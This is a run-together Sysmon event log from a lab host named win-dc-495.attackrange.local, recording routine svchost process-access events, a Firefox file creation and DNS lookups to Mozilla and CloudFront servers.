14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019306Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1100-00000000A301}1172C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019305Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000019295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:09:59.073{59A5CD1D-8E46-6005-0D00-00000000A301}628576C:\Windows\system32\svchost.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x800000000000000019324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:10:10.651{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\0lpne0dw.default-release\SiteSecurityServiceState.txt2021-01-18 14:04:57.523 22542200x800000000000000019325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:10:26.666{59A5CD1D-945A-6005-3305-00000000A301}7052firefox.settings.services.mozilla.com0::ffff:143.204.215.95;::ffff:143.204.215.126;::ffff:143.204.215.37;::ffff:143.204.215.75;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000019330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:10:26.903{59A5CD1D-945A-6005-3305-00000000A301}7052d2nxq2uap88usk.cloudfront.net02600:9000:20e8:1000:a:da5e:7900:93a1;2600:9000:20e8:4600:a:da5e:7900:93a1;2600:9000:20e8:5400:a:da5e:7900:93a1;2600:9000:20e8:6400:a:da5e:7900:93a1;2600:9000:20e8:9000:a:da5e:7900:93a1;2600:9000:20e8:a600:a:da5e:7900:93a1;2600:9000:20e8:bc00:a:da5e:7900:93a1;2600:9000:20e8:e800:a:da5e:7900:93a1;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000019329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
14:10:26.901{59A5CD1D-945A-6005-3305-00000000A301}7052d2nxq2uap88usk.cloudfront.net099.84.90.119;99.84.90.128;99.84.90.17;99.84.90.69;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000019328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:10:26.900{59A5CD1D-945A-6005-3305-00000000A301}7052content-signature-2.cdn.mozilla.net0type: 5 d2nxq2uap88usk.cloudfront.net;99.84.90.69;99.84.90.119;99.84.90.128;99.84.90.17;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000019327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:10:26.900{59A5CD1D-945A-6005-3305-00000000A301}7052content-signature-2.cdn.mozilla.net0type: 5 d2nxq2uap88usk.cloudfront.net;::ffff:99.84.90.69;::ffff:99.84.90.119;::ffff:99.84.90.128;::ffff:99.84.90.17;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000019326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:10:26.667{59A5CD1D-945A-6005-3305-00000000A301}7052firefox.settings.services.mozilla.com0143.204.215.126;143.204.215.37;143.204.215.75;143.204.215.95;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000019332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:10:28.743{59A5CD1D-8E56-6005-2E00-00000000A301}246469.90.84.99.in-addr.arpa.0type: 12 server-99-84-90-69.muc50.r.cloudfront.net;C:\Windows\sysmon64.exe 22542200x800000000000000019331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:10:27.697{59A5CD1D-8E56-6005-2E00-00000000A301}246495.215.204.143.in-addr.arpa.0type: 12 server-143-204-215-95.fra53.r.cloudfront.net;C:\Windows\sysmon64.exe